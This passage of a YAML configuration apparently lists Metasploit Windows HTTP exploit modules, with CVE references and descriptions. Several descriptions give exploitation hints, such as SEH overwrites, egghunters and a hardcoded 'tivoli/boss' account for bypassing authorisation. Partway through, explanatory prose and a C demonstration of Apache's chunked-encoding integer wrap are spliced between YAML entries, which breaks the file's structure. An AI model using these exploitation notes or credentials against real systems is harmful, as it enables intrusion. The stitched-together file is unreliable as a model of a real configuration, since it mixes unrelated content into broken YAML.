\t\t\t\tof the MaxDB and SAPDB products. This particular module is\n\
\t\t\t\tcapable of exploiting Windows systems through the use of an\n\
\t\t\t\tSEH frame overwrite. The offset to the SEH frame may change\n\
\t\t\t\tdepending on where MaxDB has been installed, this module\n\
\t\t\t\tassumes a web root path with the same length as:\n\n\
\t\t\t\tC:\\Program Files\\sdb\\programs\\web\\Documents\n\
\t\t\t"
authors:
- - CVE
- 2005-0684
- - OSVDB
- "15816"
- - URL
- http://www.idefense.com/application/poi/display?id=234&type=vulnerabilities
- - BID
- "13368"
path: extensions/metasploit/
class: Msf_module
msf_servu_session_cookie:
enable: true
msf: true
msf_key: windows/http/servu_session_cookie
name: Rhinosoft Serv-U Session Cookie Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in Rhinosoft Serv-U 9.0.0.5.\n\
\t\t\t\tSending a specially crafted POST request with an overly long session cookie\n\
\t\t\t\tstring, an attacker may be able to execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2009-4006
- - OSVDB
- "59772"
- - URL
- http://rangos.de/ServU-ADV.txt
- - URL
- http://lists.grok.org.uk/pipermail/full-disclosure/2009-November/071370.html
path: extensions/metasploit/
class: Msf_module
msf_trackercam_phparg_overflow:
enable: true
msf: true
msf_key: windows/http/trackercam_phparg_overflow
name: TrackerCam PHP Argument Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a simple stack buffer overflow in the\n\
\t\t\t\tTrackerCam web server. All current versions of this software\n\
\t\t\t\tare vulnerable to a large number of security issues. This\n\
\t\t\t\tmodule abuses the directory traversal flaw to gain\n\
\t\t\t\tinformation about the system and then uses the PHP overflow\n\
\t\t\t\tto execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2005-0478
- - OSVDB
- "13953"
- - OSVDB
- "13955"
- - BID
- "12592"
- - URL
- http://aluigi.altervista.org/adv/tcambof-adv.txt
path: extensions/metasploit/
class: Msf_module
msf_maxdb_webdbm_database:
enable: true
msf: true
msf_key: windows/http/maxdb_webdbm_database
name: MaxDB WebDBM Database Parameter Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in the MaxDB WebDBM\n\
\t\t\t\tservice. By sending a specially crafted HTTP request that contains\n\
\t\t\t\tan overly long database name, a remote attacker can overflow a buffer\n\
\t\t\t\tand execute arbitrary code on the system with the privileges of the wahttp process.\n\n\
\t\t\t\tThis module has been tested against MaxDB 7.6.00.16 and MaxDB 7.6.00.27.\n\
\t\t\t"
authors:
- - CVE
- 2006-4305
- - OSVDB
- "28300"
- - BID
- "19660"
path: extensions/metasploit/
class: Msf_module
msf_zenworks_uploadservlet:
enable: true
msf: true
msf_key: windows/http/zenworks_uploadservlet
name: Novell ZENworks Configuration Management Remote Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a code execution flaw in Novell ZENworks Configuration Management 10.2.0.\n\
\t\t\t\tBy exploiting the UploadServlet, an attacker can upload a malicious file outside of the TEMP directory\n\
\t\t\t\tand then make a secondary request that allows for arbitrary code execution.\n\
\t\t\t"
authors:
- - OSVDB
- "63412"
- - BID
- "39114"
- - URL
- http://www.zerodayinitiative.com/advisories/ZDI-10-078/
- - URL
- http://tucanalamigo.blogspot.com/2010/04/pdc-de-zdi-10-078.html
path: extensions/metasploit/
class: Msf_module
msf_mdaemon_worldclient_form2raw:
enable: true
msf: true
msf_key: windows/http/mdaemon_worldclient_form2raw
name: MDaemon <= 6.8.5 WorldClient form2raw.cgi Stack Buffer Overflow
category: Metasploit
description: "\n\
\t\t\tThis module exploits a stack buffer overflow in the Alt-N MDaemon SMTP server,\n\
\t\t\tversions 6.8.5 and earlier. When the WorldClient HTTP server is installed (default),\n\
\t\t\ta CGI script is provided to accept HTML FORM-based emails and deliver them via MDaemon.exe\n\
\t\t\tby writing the CGI output to the Raw Queue. When X-FromCheck is enabled (also default),\n\
\t\t\tthe temporary form2raw.cgi data is copied by MDaemon.exe and a stack based\n\
\t\t\toverflow occurs when an excessively long From field is specified.\n\
\t\t\tThe RawQueue is processed every 1 minute by default, to a maximum of 60 minutes.\n\
\t\t\tKeep this in mind when choosing payloads or setting WfsDelay... You'll need to wait.\n\n\
\t\t\tFurthermore, this exploit uses a direct memory jump into a nopsled (which isn't very\n\
\t\t\treliable). Once the payload is written into the Raw Queue by Form2Raw, MDaemon will\n\
\t\t\tcontinue to crash/execute the payload until the CGI output is manually deleted\n\
\t\t\tfrom the queue in C:\\MDaemon\\RawFiles\\*.raw.\n\
\t\t\t"
authors:
- - CVE
- 2003-1200
- - OSVDB
- "3255"
- - BID
- "9317"
path: extensions/metasploit/
class: Msf_module
msf_hp_nnm_snmp:
enable: true
msf: true
msf_key: windows/http/hp_nnm_snmp
name: HP OpenView Network Node Manager Snmp.exe CGI Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.50.\n\
\t\t\t\t\tBy sending a specially crafted CGI request to Snmp.exe, an attacker may be able to execute\n\
\t\t\t\t\tarbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2009-3849
- - OSVDB
- "60933"
path: extensions/metasploit/
class: Msf_module
msf_hp_nnm_getnnmdata_icount:
enable: true
msf: true
msf_key: windows/http/hp_nnm_getnnmdata_icount
name: HP OpenView Network Node Manager getnnmdata.exe (ICount) CGI Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in HP OpenView Network Node Manager 7.50/7.53.\n\
\t\t\t\tBy sending a specially crafted ICount parameter to the getnnmdata.exe CGI,\n\
\t\t\t\tan attacker may be able to execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2010-1554
- - OSVDB
- "64976"
path: extensions/metasploit/
class: Msf_module
msf_easyftp_list:
enable: true
msf: true
msf_key: windows/http/easyftp_list
name: EasyFTP Server <= 1.7.0.11 list.html path Stack Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack-based buffer overflow in EasyFTP Server 1.7.0.11\n\
\t\t\t\tand earlier. EasyFTP fails to check input size when parsing the 'path' parameter\n\
\t\t\t\tsupplied to an HTTP GET request, which leads to a stack based buffer overflow.\n\
\t\t\t\tEasyFTP allows anonymous access by default; valid credentials are typically\n\
\t\t\t\tunnecessary to exploit this vulnerability.\n\n\
\t\t\t\tAfter version 1.7.0.12, this package was renamed \"UplusFtp\".\n\n\
\t\t\t\tDue to limited space, as well as difficulties using an egghunter, the use of\n\
\t\t\t\tstaged, ORD, and/or shell payloads is recommended.\n\
\t\t\t"
authors:
- - OSVDB
- "66614"
- - URL
- http://www.exploit-db.com/exploits/11500/
path: extensions/metasploit/
class: Msf_module
msf_novell_messenger_acceptlang:
enable: true
msf: true
msf_key: windows/http/novell_messenger_acceptlang
name: Novell Messenger Server 2.0 Accept-Language Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Novell GroupWise\n\
\t\t\t\tMessenger Server v2.0. This flaw is triggered by any HTTP\n\
\t\t\t\trequest with an Accept-Language header greater than 16 bytes.\n\
\t\t\t\tTo overwrite the return address on the stack, we must first\n\
\t\t\t\tpass a memcpy() operation that uses pointers we supply. Due to the\n\
\t\t\t\tlarge list of restricted characters and the limitations of the current\n\
\t\t\t\tencoder modules, very few payloads are usable.\n\
\t\t\t"
authors:
- - CVE
- 2006-0992
- - OSVDB
- "24617"
- - BID
- "17503"
path: extensions/metasploit/
class: Msf_module
msf_savant_31_overflow:
enable: true
msf: true
msf_key: windows/http/savant_31_overflow
name: Savant 3.1 Web Server Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Savant 3.1 Web Server. The service\n\
\t\t\t\tsupports a maximum of 10 threads (for a default install). Each exploit attempt\n\
\t\t\t\tgenerally causes a thread to die whether successful or not. Therefore, in a default\n\
\t\t\t\tconfiguration, you only have 10 chances.\n\n\
\t\t\t\tDue to the limited space available for the payload in this exploit module, use of the\n\
\t\t\t\t\"ord\" payloads is recommended.\n\
\t\t\t"
authors:
- - CVE
- 2002-1120
- - OSVDB
- "9829"
- - BID
- "5686"
- - URL
- http://www.milw0rm.com/exploits/787
path: extensions/metasploit/
class: Msf_module
msf_ipswitch_wug_maincfgret:
enable: true
msf: true
msf_key: windows/http/ipswitch_wug_maincfgret
name: Ipswitch WhatsUp Gold 8.03 Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in Ipswitch WhatsUp Gold 8.03. By\n\
\t\t\t\tposting a long string for the value of 'instancename' in the _maincfgret.cgi\n\
\t\t\t\tscript an attacker can overflow a buffer and execute arbitrary code on the system.\n\
\t\t\t"
authors:
- - CVE
- 2004-0798
- - OSVDB
- "9177"
- - BID
- "11043"
path: extensions/metasploit/
class: Msf_module
msf_xitami_if_mod_since:
enable: true
msf: true
msf_key: windows/http/xitami_if_mod_since
name: Xitami 2.5c2 Web Server If-Modified-Since Overflow
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a stack buffer overflow in the iMatix Corporation\n\
\t\t\t\tXitami Web Server. If a malicious user sends an If-Modified-Since\n\
\t\t\t\theader containing an overly long string, it may be possible to\n\
\t\t\t\texecute a payload remotely. Due to size constraints, this module uses\n\
\t\t\t\tthe Egghunter technique.\n\
\t\t\t"
authors:
- - CVE
- 2007-5067
- - OSVDB
- "40594"
- - OSVDB
- "40595"
- - BID
- "25772"
- - URL
- http://www.milw0rm.com/exploits/4450
path: extensions/metasploit/
class: Msf_module
msf_ia_webmail:
enable: true
msf: true
msf_key: windows/http/ia_webmail
name: IA WebMail 3.x Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis exploits a stack buffer overflow in the IA WebMail server.\n\
\t\t\t\tThis exploit has not been tested against a live system at\n\
\t\t\t\tthis time.\n\
\t\t\t"
authors:
- - CVE
- 2003-1192
- - OSVDB
- "2757"
- - BID
- "8965"
- - URL
- http://www.k-otik.net/exploits/11.19.iawebmail.pl.php
path: extensions/metasploit/
class: Msf_module
msf_hp_nnm_ovas:
enable: true
msf: true
msf_key: windows/http/hp_nnm_ovas
name: HP OpenView NNM 7.53, 7.51 OVAS.EXE Pre-Authentication Stack Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in HP OpenView Network Node Manager versions 7.53 and earlier.\n\
\t\t\t\tSpecifically this vulnerability is caused by a failure to properly handle user supplied input within the\n\
\t\t\t\tHTTP request including headers and the actual URL GET request.\n\n\
\t\t\t\tExploitation is tricky due to character restrictions. It was necessary to utilize an egghunter shellcode\n\
\t\t\t\twhich was alphanumeric encoded by muts in the original exploit.\n\n\
\t\t\t\tIf you plan on using this exploit for a remote shell, you will likely want to migrate to a different process\n\
\t\t\t\tas soon as possible. Any connections get reset after a short period of time. This is probably some timeout\n\
\t\t\t\thandling code that causes this.\n\
\t\t\t"
authors:
- - CVE
- 2008-1697
- - OSVDB
- "43992"
- - BID
- "28569"
path: extensions/metasploit/
class: Msf_module
msf_sybase_easerver:
enable: true
msf: true
msf_key: windows/http/sybase_easerver
name: Sybase EAServer 5.2 Remote Stack Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in the Sybase EAServer Web\n\
\t\t\t\tConsole. The offset to the SEH frame appears to change depending\n\
\t\t\t\ton what version of Java is in use by the remote server, making this\n\
\t\t\t\texploit somewhat unreliable.\n\
\t\t\t"
authors:
- - CVE
- 2005-2297
- - OSVDB
- "17996"
- - BID
- "14287"
path: extensions/metasploit/
class: Msf_module
msf_privatewire_gateway:
enable: true
msf: true
msf_key: windows/http/privatewire_gateway
name: Private Wire Gateway Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis exploits a buffer overflow in the ADMCREG.EXE used\n\
\t\t\t\tin the PrivateWire Online Registration Facility.\n\
\t\t\t"
authors:
- - CVE
- 2006-3252
- - OSVDB
- "26861"
- - BID
- "18647"
path: extensions/metasploit/
class: Msf_module
msf_belkin_bulldog:
enable: true
msf: true
msf_key: windows/http/belkin_bulldog
name: Belkin Bulldog Plus Web Service Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Belkin Bulldog Plus\n\
\t\t\t\t4.0.2 build 1219. When sending a specially crafted HTTP request,\n\
\t\t\t\tan attacker may be able to execute arbitrary code.\n\
\t\t\t"
authors:
- - OSVDB
- "54395"
- - BID
- "34033"
path: extensions/metasploit/
class: Msf_module
msf_shoutcast_format:
enable: true
msf: true
msf_key: windows/http/shoutcast_format
name: SHOUTcast DNAS/win32 1.9.4 File Request Format String Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a format string vulnerability in the\n\
\t\t\t\tNullsoft SHOUTcast server for Windows. The vulnerability is\n\
\t\t\t\ttriggered by requesting a file path that contains format\n\
\t\t\t\tstring specifiers. This vulnerability was discovered by\n\
\t\t\t\tTomasz Trojanowski and Damian Put.\n\
\t\t\t"
authors:
- - CVE
- 2004-1373
- - OSVDB
- "12585"
- - BID
- "12096"
path: extensions/metasploit/
class: Msf_module
msf_hp_nnm_webappmon_ovjavalocale:
enable: true
msf: true
msf_key: windows/http/hp_nnm_webappmon_ovjavalocale
name: HP NNM CGI webappmon.exe OvJavaLocale Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53.\n\
\t\t\t\tBy sending a request containing a cookie longer than 5120 bytes, an attacker can overflow\n\
\t\t\t\ta stack buffer and execute arbitrary code.\n\n\
\t\t\t\tThe vulnerable code is within the OvWwwDebug function. The static-sized stack buffer is\n\
\t\t\t\tdeclared within this function. When the vulnerability is triggered, the stack trace looks\n\
\t\t\t\tlike the following:\n\n\
\t\t\t\t\t#0 ...\n\
\t\t\t\t\t#1 sprintf_new(local_stack_buf, fmt, cookie);\n\
\t\t\t\t\t#2 OvWwwDebug(\" HTTP_COOKIE=%s\\n\", cookie);\n\
\t\t\t\t\t#3 ?OvWwwInit@@YAXAAHQAPADPBD@Z(x, x, x);\n\
\t\t\t\t\t#4 sub_405ee0(\"nnm\", \"webappmon\");\n\n\
\t\t\t\tNo validation is done on the cookie argument. There are no stack cookies, so exploitation\n\
\t\t\t\tis easily achieved by overwriting the saved return address or SEH frame.\n\n\
\t\t\t\tThe original advisory detailed an attack vector using the \"OvJavaLocale\" cookie being\n\
\t\t\t\tpassed in a request to \"webappmon.exe\". Further research shows that several different\n\
\t\t\t\tcookie values, as well as several different CGI applications, can be used.\n\
\t\t\t"
authors:
- - CVE
- 2010-2709
- - OSVDB
- "66932"
- - BID
- "42154"
- - URL
- http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02446520
- - URL
- http://www.coresecurity.com/content/hp-nnm-ovjavalocale-buffer-overflow
path: extensions/metasploit/
class: Msf_module
msf_hp_nnm_webappmon_execvp:
enable: true
msf: true
msf_key: windows/http/hp_nnm_webappmon_execvp
name: HP OpenView Network Node Manager execvp_nc Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53\n\
\t\t\t\tprior to NNM_01207 or NNM_01206 without the SSRT100025 hotfix. By specifying a long 'sel'\n\
\t\t\t\tparameter when calling methods within the 'webappmon.exe' CGI program, an attacker can\n\
\t\t\t\tcause a stack-based buffer overflow and execute arbitrary code.\n\n\
\t\t\t\tThis vulnerability is not triggerable via a GET request due to limitations on the\n\
\t\t\t\trequest size. The buffer being targeted is 16384 bytes in size. There are actually two\n\
\t\t\t\tadjacent buffers that both get overflowed (one into the other), and strcat is used.\n\n\
\t\t\t\tThe vulnerable code is within the \"execvp_nc\" function within \"ov.dll\" prior to\n\
\t\t\t\tv 1.30.12.69. There are no stack cookies, so exploitation is easily achieved by\n\
\t\t\t\toverwriting the saved return address or SEH frame.\n\n\
\t\t\t\tThis vulnerability might also be triggerable via other CGI programs, however this was\n\
\t\t\t\tnot fully investigated.\n\
\t\t\t"
authors:
- - CVE
- 2010-2703
- - OSVDB
- "66514"
- - BID
- "41829"
- - URL
- http://www.vupen.com/english/advisories/2010/1866
- - URL
- http://www.zerodayinitiative.com/advisories/ZDI-10-137/
- - URL
- http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02286088
path: extensions/metasploit/
class: Msf_module
msf_steamcast_useragent:
enable: true
msf: true
msf_key: windows/http/steamcast_useragent
name: Streamcast <= 0.9.75 HTTP User-Agent Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Streamcast <= 0.9.75. By sending\n\
\t\t\t\t\tan overly long User-Agent in an HTTP GET request, an attacker may be able to\n\
\t\t\t\t\texecute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2008-0550
- - OSVDB
- "42670"
- - URL
- http://aluigi.altervista.org/adv/steamcazz-adv.txt
- - BID
- "33898"
path: extensions/metasploit/
class: Msf_module
msf_fdm_auth_header:
enable: true
msf: true
msf_key: windows/http/fdm_auth_header
name: Free Download Manager Remote Control Server Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Free Download Manager\n\
\t\t\t\tRemote Control 2.5 Build 758. When sending a specially crafted\n\
\t\t\t\tAuthorization header, an attacker may be able to execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2009-0183
- - OSVDB
- "51745"
path: extensions/metasploit/
class: Msf_module
msf_hp_nnm_ovwebsnmpsrv_main:
enable: true
msf: true
msf_key: windows/http/hp_nnm_ovwebsnmpsrv_main
name: HP OpenView Network Node Manager ovwebsnmpsrv.exe main Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53\n\
\t\t\t\tprior to NNM_01203. By specifying a long 'arg' parameter when executing the 'jovgraph.exe'\n\
\t\t\t\tCGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary code.\n\n\
\t\t\t\tThis vulnerability is triggerable via either a GET or POST request. The buffer being\n\
\t\t\t\twritten to is 1024 bytes in size. It is important to note that this vulnerability must\n\
\t\t\t\tbe exploited by overwriting SEH. Otherwise, CVE-2010-1961 is triggered!\n\n\
\t\t\t\tThe vulnerable code is within the \"main\" function within \"ovwebsnmpsrv.exe\" with a\n\
\t\t\t\ttimestamp prior to April 7th, 2010. There are no stack cookies, so exploitation is\n\
\t\t\t\teasily achieved by overwriting SEH structures.\n\n\
\t\t\t\tThere exists some unreliability when running this exploit. It is not completely clear why\n\
\t\t\t\tat this time, but may be related to OVWDB or session management. Also, on some attempts\n\
\t\t\t\tOV NNM may report invalid characters in the URL. It is not clear what is causing this\n\
\t\t\t\teither.\n\
\t\t\t"
authors:
- - CVE
- 2010-1964
- - OSVDB
- "65552"
- - BID
- "40873"
- - URL
- http://www.zerodayinitiative.com/advisories/ZDI-10-108/
- - URL
- http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02217439
path: extensions/metasploit/
class: Msf_module
msf_ibm_tpmfosd_overflow:
enable: true
msf: true
msf_key: windows/http/ibm_tpmfosd_overflow
name: IBM TPM for OS Deployment 5.1.0.x rembo.exe Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis is a stack buffer overflow exploit for IBM Tivoli Provisioning Manager\n\
\t\t\t\tfor OS Deployment version 5.1.0.X.\n\
\t\t\t"
authors:
- - CVE
- 2007-1868
- - OSVDB
- "34678"
- - BID
- "23264"
- - URL
- http://dvlabs.tippingpoint.com/advisory/TPTI-07-05
path: extensions/metasploit/
class: Msf_module
msf_ibm_tsm_cad_header:
enable: true
msf: true
msf_key: windows/http/ibm_tsm_cad_header
name: IBM Tivoli Storage Manager Express CAD Service Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in the IBM Tivoli Storage Manager Express CAD Service (5.3.3).\n\
\t\t\t\tBy sending an overly long GET request, it may be possible for an attacker to execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2007-4880
- - OSVDB
- "38161"
- - BID
- "25743"
path: extensions/metasploit/
class: Msf_module
msf_hp_nnm_ovwebsnmpsrv_uro:
enable: true
msf: true
msf_key: windows/http/hp_nnm_ovwebsnmpsrv_uro
name: HP OpenView Network Node Manager ovwebsnmpsrv.exe Unrecognized Option Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53\n\
\t\t\t\tprior to NNM_01203. By specifying a long 'arg' parameter when executing the 'jovgraph.exe'\n\
\t\t\t\tCGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary code.\n\
\t\t\t\tThe vulnerable code is within the option parsing function within \"ovwebsnmpsrv.exe\" with a\n\
\t\t\t\ttimestamp prior to April 7th, 2010.\n\n\
\t\t\t\tReaching the vulnerable code requires a 'POST' request with an 'arg' parameter that, when combined\n\
\t\t\t\twith some static text, exceeds 10240 bytes. The parameter must begin with a dash. It is\n\
\t\t\t\timportant to note that this vulnerability must be exploited by overwriting SEH. This is since\n\
\t\t\t\toverflowing the buffer with controllable data always triggers an access violation when\n\
\t\t\t\tattempting to write static text beyond the end of the stack.\n\n\
\t\t\t\tExploiting this issue is a bit tricky due to a restrictive character set. In order to accomplish\n\
\t\t\t\tarbitrary code execution, a double-backward jump is used in combination with the Alpha2\n\
\t\t\t\tencoder.\n\
\t\t\t"
authors:
- - CVE
- 2010-1960
- - OSVDB
- "65427"
- - BID
- "40637"
- - URL
- http://www.zerodayinitiative.com/advisories/ZDI-10-105/
- - URL
- http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02217439
path: extensions/metasploit/
class: Msf_module
msf_navicopa_get_overflow:
enable: true
msf: true
msf_key: windows/http/navicopa_get_overflow
name: NaviCOPA 2.0.1 URL Handling Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a stack buffer overflow in NaviCOPA 2.0.1.\n\
\t\t\t\tThe vulnerability is caused due to a boundary error within the\n\
\t\t\t\thandling of URL parameters.\n\
\t\t\t"
authors:
- - CVE
- 2006-5112
- - OSVDB
- "29257"
- - BID
- "20250"
path: extensions/metasploit/
class: Msf_module
msf_manageengine_apps_mngr:
enable: true
msf: true
msf_key: windows/http/manageengine_apps_mngr
name: ManageEngine Applications Manager Authenticated Code Execution
category: Metasploit
description: "\n\
\t\t\t\t\t\tThis module logs into the ManageEngine Applications Manager to upload a\n\
\t\t\t\t\tpayload to the file system and a batch script that executes the payload. "
authors: []
path: extensions/metasploit/
class: Msf_module
msf_sapdb_webtools:
enable: true
msf: true
msf_key: windows/http/sapdb_webtools
name: SAP DB 7.4 WebTools Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in SAP DB 7.4 WebTools.\n\
\t\t\t\tBy sending an overly long GET request, it may be possible for\n\
\t\t\t\tan attacker to execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2007-3614
- - OSVDB
- "37838"
- - BID
- "24773"
path: extensions/metasploit/
class: Msf_module
msf_ibm_tivoli_endpoint_bof:
enable: true
msf: true
msf_key: windows/http/ibm_tivoli_endpoint_bof
name: IBM Tivoli Endpoint Manager POST Query Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack based buffer overflow in the way IBM Tivoli \n\
\t\t\t\tEndpoint Manager versions 3.7.1, 4.1, 4.1.1, 4.3.1 handles long POST query \n\
\t\t\t\targuments.\n\n\
\t\t\t\tThis issue can be triggered by sending a specially crafted HTTP POST request to \n\
\t\t\t\tthe service (lcfd.exe) listening on TCP port 9495. To trigger this issue authorization\n\
\t\t\t\tis required. This exploit makes use of a second vulnerability, a hardcoded account\n\
\t\t\t\t(tivoli/boss) is used to bypass the authorization restriction.\n\
\t\t\t"
authors:
- - CVE
- 2011-1220
- - OSVDB
- "72713"
- - OSVDB
- "72751"
- - BID
- "48049"
- - URL
- http://www.zerodayinitiative.com/advisories/ZDI-11-169/
path: extensions/metasploit/
class: Msf_module
msf_apache_chunked:
enable: true
msf: true
msf_key: windows/http/apache_chunked
name: Apache Win32 Chunked Encoding
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits the chunked transfer integer wrap\n\
\t\t\t\tvulnerability in Apache version 1.2.x to 1.3.24. This\n\
\t\t\t\tparticular module has been tested with all versions of the\n\
\t\t\t\tofficial Win32 build between 1.3.9 and 1.3.24. Additionally,\n\
\t\t\t\tit should work against most co-branded and bundled versions\n\
\t\t\t\tof Apache (Oracle 8i, 9i, IBM HTTPD, etc).\n\n\
\t\t\t\tYou will need to use the Check() functionality to determine\n\
\t\t\t\tthe exact target version prior to launching the exploit. The\n\
\t\t\t\tversion of Apache bundled with Oracle 8.1.7 will not\n\
\t\t\t\tautomatically restart, so if you use the wrong target value,\n\
\t\t\t\tthe server will crash.\n\
\t\t\t"
authors:
- - CVE
- 2002-0392
- - OSVDB
- "838"
- - BID
- "5033"
- - URL
- http://lists.insecure.org/lists/bugtraq/2002/Jun/0184.html
path: extensions/metasploit/
class: Msf_module
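The "chunked transfer integer wrap" the Apache entry refers to, shown as an added illustration in C (this is not Apache's source and not code from the Metasploit module): the chunk size is parsed as an unsigned hex value, narrowed to a signed int, and bounds-checked as signed, so a size such as FFFFFFF0 reads as -16, passes the check, and would reach memcpy as a length of about 4 GiB. The function names, the 8192-byte receive buffer and the input strings below are assumptions made for the demo.

```c
#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

/* Parse a chunk-size line ("1A", "FFFFFFF0", optionally followed by a
   ";ext" or CRLF) as hex.  Returns 0 on success with the raw unsigned
   value in *out, -1 on junk or overflow. */
static int parse_chunk_size(const char *line, unsigned long *out)
{
    char *end = NULL;
    errno = 0;
    unsigned long v = strtoul(line, &end, 16);
    if (end == line || errno == ERANGE)
        return -1;
    if (*end != '\0' && *end != ';' && *end != '\r')
        return -1;
    *out = v;
    return 0;
}

/* Vulnerable pattern (illustrative, not Apache's code): the size is
   narrowed to a signed int and bounds-checked as signed, then would be
   handed to memcpy as size_t.  0xFFFFFFF0 becomes -16, which compares
   below bufsize, so the check passes.  Returns 1 if the chunk would be
   accepted, 0 if rejected.  (The unsigned-to-int narrowing is
   implementation-defined in C; gcc and clang wrap it two's-complement,
   which is the behaviour the bug relied on.) */
int vuln_chunk_accepted(const char *line, size_t bufsize)
{
    unsigned long raw;
    if (parse_chunk_size(line, &raw) != 0)
        return 0;
    int len = (int)(uint32_t)raw;
    if (len > (int)bufsize)
        return 0;                    /* the only bounds check */
    /* memcpy(buf, body, (size_t)len);  -16 widens to SIZE_MAX - 15 */
    return 1;
}

/* The length the vulnerable path would actually pass to memcpy. */
size_t vuln_memcpy_length(const char *line)
{
    unsigned long raw;
    if (parse_chunk_size(line, &raw) != 0)
        return 0;
    return (size_t)(int)(uint32_t)raw;
}

/* Hardened pattern: keep the value unsigned end to end and refuse
   anything that does not fit the receive buffer, so the type the size
   is checked as is the type memcpy receives. */
int safe_chunk_accepted(const char *line, size_t bufsize)
{
    unsigned long raw;
    if (parse_chunk_size(line, &raw) != 0)
        return 0;
    if (raw > bufsize)
        return 0;
    /* memcpy(buf, body, (size_t)raw); now bounded by bufsize */
    return 1;
}

int main(void)
{
    const char *sizes[] = { "10", "4000", "FFFFFFF0", "zz" };
    for (size_t i = 0; i < sizeof sizes / sizeof sizes[0]; i++)
        printf("%-9s vulnerable:%d hardened:%d memcpy_len:%zu\n", sizes[i],
               vuln_chunk_accepted(sizes[i], 8192),
               safe_chunk_accepted(sizes[i], 8192),
               vuln_memcpy_length(sizes[i]));
    return 0;
}
```

The point of the hardened version is not the extra comparison but the type discipline: the value is checked and consumed as the same unsigned type, so no narrowing step can flip its sign between the check and the copy.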
msf_hp_power_manager_login:
enable: true
msf: true
msf_key: windows/http/hp_power_manager_login
name: Hewlett-Packard Power Manager Administration Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Hewlett-Packard Power Manager 4.2.\n\
\t\t\t\tSending a specially crafted POST request with an overly long Login string, an\n\
\t\t\t\tattacker may be able to execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2009-2685
- - OSVDB
- "59684"
path: extensions/metasploit/
class: Msf_module
msf_hp_nnm_openview5:
enable: true
msf: true
msf_key: windows/http/hp_nnm_openview5
name: HP OpenView Network Node Manager OpenView5.exe CGI Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.50.\n\
\t\t\t\tBy sending a specially crafted CGI request, an attacker may be able to execute\n\
\t\t\t\tarbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2007-6204
- - OSVDB
- "39530"
- - BID
- "26741"
path: extensions/metasploit/
class: Msf_module
msf_psoproxy91_overflow:
enable: true
msf: true
msf_key: windows/http/psoproxy91_overflow
name: PSO Proxy v0.91 Stack Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a buffer overflow in the PSO Proxy v0.91 web server.\n\
\t\t\t\tIf a client sends an excessively long string the stack is overwritten.\n\
\t\t\t"
authors:
- - CVE
- 2004-0313
- - OSVDB
- "4028"
- - URL
- http://www.milw0rm.com/exploits/156
- - BID
- "9706"
path: extensions/metasploit/
class: Msf_module
msf_hp_nnm_snmpviewer_actapp:
enable: true
msf: true
msf_key: windows/http/hp_nnm_snmpviewer_actapp
name: HP OpenView Network Node Manager snmpviewer.exe Buffer Overflow
category: Metasploit
description: "\n\
